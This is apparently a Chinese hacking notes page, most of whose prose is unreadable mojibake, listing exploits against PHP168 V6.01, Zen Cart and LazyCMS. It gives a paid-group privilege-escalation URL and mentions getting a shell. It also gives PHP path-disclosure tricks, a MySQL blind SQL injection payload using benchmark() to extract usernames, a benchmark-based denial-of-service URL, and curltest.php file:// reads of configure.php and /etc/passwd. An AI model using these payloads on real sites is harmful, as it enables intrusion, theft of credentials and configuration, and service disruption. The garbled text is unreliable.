PHP168 V6.01 Ȩ©

PH
P168 V6.01 Ȩ©
PHP168վPHPǰǿĽվϵͳȫԴɼ䷽Ľжοйģɰװɾûȫʹ

HPCMS V6.01صİȫ

עһʻԱġhttp//www.xxxx.com/member/buygroup.php?job=buy&gid=3
ῴ

ڵļͨԱ㽫ҪļǳԱҪ0

緵ڼǳԱػԱĲ鿴һ
Ȼҵ̨¼shell
======================================================================
phpҳ·
phpҳ·
1'
2ͣid=1Ϊid=a ʱЧ
3,id=1Ϊid=1111111111111111111111...... ʱЧ
4text.php?aa[]=xx
5phpmax_execution_time, ܽ·ʾ. ʷǳС.ʺڷصʱ.
6benchmark( 999999999999999999, md5( 'test' ) )
BENCHMARK(count,expr)BENCHMARK()ظcountTimesִбʽexprڼʱMySQLʽж졣ֵ0
id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
Ҹܾ񹥻http://www.xxxx.com/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))ǰỹҪע
============================================================
zen cartļȡ©
zen cartļȡ©
õҳ·http://www.xxxx.com/extras/ipn_test_return.php
õվϢhttp://www.xxxxx.com/extras/curltest.php?url=file:///var/www/http/includes/configure.php
ȡlinuxpasswdhttp://www.xxxx.com/extras/curltest.php?url=file:///etc/passwd
עZen CartǿԴѵ̳ϵͳڽרҵ̵
============================================================
LazyCMS©
1̨©http://www.xxxx.com/page/index.php/System/Index.html
2վ·©http://www.xxxx.com/page/index.php/Archives/Search?query=%27&submit.x=11&submit.y=0
һ©ڼṤѧƽվFTPеܣ
